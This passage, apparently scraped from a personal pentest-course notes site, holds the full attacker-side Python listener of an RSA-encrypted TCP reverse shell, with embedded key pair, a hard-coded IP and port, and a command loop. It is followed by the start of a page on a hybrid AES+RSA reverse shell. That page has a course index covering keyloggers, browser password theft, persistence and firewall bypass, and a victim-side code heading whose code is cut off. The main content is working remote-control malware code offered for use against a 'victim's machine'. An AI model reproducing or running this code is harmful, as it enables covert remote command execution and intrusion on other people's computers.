[41](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-41)
[42](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-42)
[43](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-43)
[44](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-44)
[45](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-45)
[46](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-46)
[47](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-47)
[48](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-48)
[49](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-49)
[50](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-50)
[51](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-51)
[52](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-52)
[53](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-53)
[54](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-54)
[55](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-55)
[56](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-56)
[57](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-57)
[58](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-58)
[59](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-59)
[60](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-60)
[61](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-61)
[62](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-62)
[63](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-63)
[64](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-64)
[65](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-65)
[66](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-66)
[67](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-67)
[68](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-68)
[69](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-69)
[70](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-70)
[71](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-71)
[72](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-72)
[73](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-73)
[74](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-74)
[75](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-75)
[76](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-76)
[77](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-77)
[78](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-78)
[79](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-79)
[80](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-80)
[81](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-81)
[82](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-82)
[83](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-83)
[84](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-84)
[85](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-85)
[86](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-86)
[87](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-87)
[88](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-88)
[89](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-89)
[90](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-90)
[91](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-91)
[92](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-92)
[93](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-93)
[94](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-94)
[95](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-95)
[96](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-96)
[97](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-97)
[98](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-98)
[99](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-99)
[100](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-100)
[101](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-101)
[102](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-102)
[103](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-103)
[104](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/#__codelineno-4-104) | `import socket from Cryptodome.PublicKey import RSA from Cryptodome.Cipher import PKCS1_OAEP def encrypt(message): publickey = '''-----BEGIN PUBLIC KEY----- MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAt9mjsBED9D/MYnU+W5+6 aP9SS1vgL9X6bThNkGKsZ5ZVfnoK4BxMBHI5Gi/YtoCJjyAGsWMpxy1fQ+F+ZWVA kwZDoQMWTrfZASHmQgB944PfGA7qfn15kDXmCyvzbitRyWvTs1LDDNF7Q/54Qj82 h/85ibOPzQrpwQTjEAs8CJ14YWXAJnqOC6devaDYKdB7SSlueVtoQ8BxWc3hOJHJ pvgZQ/6NixnICLIrFN0YbKZo4A0D3yRJIdumZw8uqwEMeIt41ja6zOG3gKtsG8su BZ/MvqX0WgojWr6hNs1Q8h3LtiSsPiUP/bTWD9zos8Yr7RuEabesjHlY0qcNzZ/Y gKXdgxUkCikTjRon6Mvh7iWKAtEilQlDeBYMGUvFUQ5FMF5LZJ5Q/7+JXulv8Whq KTp4dGpB3kUWuN+ltxBr+IYPhpBfMcR97W+NuXDReUiIGFJpVI1m4AeCzz1BdAM7 U928DcglK6IowMmN4McyKuv49YYPd7TNFjJWc7P6e19V3BsxA5jpCc6Dxp5AM6WC 0FqgSSOGVCIkcHT5wLcALyaXOaO0vhMgWWO233Of33wh/7oHclsc5r44MHlZrNSe X2QIHCFU4Mwp1hutIuIKkn5dLt1qmt2CDUO/uxGbdTf667c9TLYcYWoi/eDBdrVx 7CkYI7g81RdcB6jGgbr9W4kCAwEAAQ== -----END PUBLIC KEY-----''' public_key = RSA.importKey(publickey) encryptor = PKCS1_OAEP.new(public_key) encryptedData = encryptor.encrypt(message) return encryptedData def decrypt(cipher): privatekey = '''-----BEGIN RSA PRIVATE KEY----- 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 -----END RSA PRIVATE KEY-----''' private_key = RSA.importKey(privatekey) decryptor = PKCS1_OAEP.new(private_key) dec = decryptor.decrypt(cipher) return dec.decode() def connect(): s = socket.socket() s.bind(('192.168.0.152', 8080)) s.listen(1) print('[+] Listening for incoming TCP connection on port 8080') conn, addr = s.accept() while True: store = '' command = input("Shell> ") if 'terminate' in command: conn.send('terminate'.encode()) conn.close() break else: command = encrypt(command.encode()) conn.send(command) result = conn.recv(1024) try: print(decrypt(result)) except: print("[-] unable to decrypt/receive data!") connect()` |
Last update: 2024-03-29
Created: April 11, 2023 16:43:35
Back to top
---
# TCP reverse shell with hybrid encryption AES + RSA - Hacking Life
[Skip to content](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#tcp-reverse-shell-with-hybrid-encryption-aes-rsa)
TCP reverse shell with hybrid encryption AES + RSA
==================================================
From course: [Python For Offensive PenTest: A Complete Practical Course](https://www.udemy.com/course/python-for-offensive-security-practical-course/)
.
General index of the course
* Gaining persistence shells (TCP + HTTP):
* [Coding a TCP connection and a reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-tcp-reverse-shell/)
.
* [Coding a low level data exfiltration - TCP connection](https://amandaguglieri.github.io/hackinglife/python/coding-a-low-level-data-exfiltration-tcp/)
.
* [Coding an http reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-an-http-reverse-shell/)
.
* [Coding a data exfiltration script for a http shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-data-exfiltration-script-http-shell/)
.
* [Tunning the connection attempts](https://amandaguglieri.github.io/hackinglife/python/tunning-the-connection-attemps/)
.
* [Including cd command into TCP reverse shell](https://amandaguglieri.github.io/hackinglife/python/including-cd-command-into-tcp-reverse-shell/)
.
* Advanced scriptable shells:
* [Using a Dynamic DNS instead of your bared attacker public ip](https://amandaguglieri.github.io/hackinglife/python/ddns-aware-shell/)
.
* [Making your binary persistent](https://amandaguglieri.github.io/hackinglife/python/making-your-binary-persistent/)
.
* [Making a screenshot](https://amandaguglieri.github.io/hackinglife/python/making-a-screenshot/)
.
* [Coding a reverse shell that searches files](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/)
.
* Techniques for bypassing filters:
* [Coding a reverse shell that scans ports](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/)
.
* [Hickjack the Internet Explorer process to bypass an host-based firewall](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/)
.
* [Bypassing Next Generation Firewalls](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/)
.
* [Bypassing IPS with handmade XOR Encryption](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/)
.
* Malware and crytography:
* [TCP reverse shell with AES encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/)
.
* [TCP reverse shell with RSA encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/)
.
* [TCP reverse shell with hybrid encryption AES + RSA](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/)
.
* Password Hickjacking:
* [Simple keylogger in python](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/)
.
* [Hijacking Keepass Password Manager](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/)
.
* [Dumping saved passwords from Google Chrome](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/)
.
* [Man in the browser attack](https://amandaguglieri.github.io/hackinglife/python/man-in-the-browser-attack/)
.
* [DNS Poisoning](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/)
.
* Privilege escalation:
* [Weak service file permission](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/)
.
Client side
-----------
To be run on the victim's machine.
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-1)
[2](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-2)
[3](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-3)
[4](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-4)
[5](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-5)
[6](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-6)
[7](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-7)
[8](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-8)
[9](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-9)
[10](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-10)
[11](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-11)
[12](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-12)
[13](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-13)
[14](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-14)
[15](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-15)
[16](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-16)
[17](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-17)
[18](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-18)
[19](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-19)
[20](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-20)
[21](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-21)
[22](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-22)
[23](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-23)
[24](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-24)
[25](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-25)
[26](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-26)
[27](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-27)
[28](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-28)
[29](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-29)
[30](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-30)
[31](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-31)
[32](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-32)
[33](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-33)
[34](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-34)
[35](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-35)
[36](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-36)
[37](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-37)
[38](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-38)
[39](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-39)
[40](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-40)
[41](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-41)
[42](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-42)
[43](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-43)
[44](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-44)
[45](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-45)
[46](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-46)
[47](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-47)
[48](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-48)
[49](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-49)
[50](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-50)
[51](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-51)
[52](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-52)
[53](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-53)
[54](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-54)
[55](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-55)
[56](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-56)
[57](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-57)
[58](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-58)
[59](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-59)
[60](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-60)
[61](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-61)
[62](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-62)
[63](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-63)
[64](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-64)
[65](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-65)
[66](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-66)
[67](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-67)
[68](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-68)
[69](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-69)
[70](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-70)
[71](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-71)
[72](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-72)
[73](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-73)
[74](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-74)
[75](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-75)
[76](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-76)
[77](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-77)
[78](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-78)
[79](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-79)
[80](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-80)
[81](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-81)
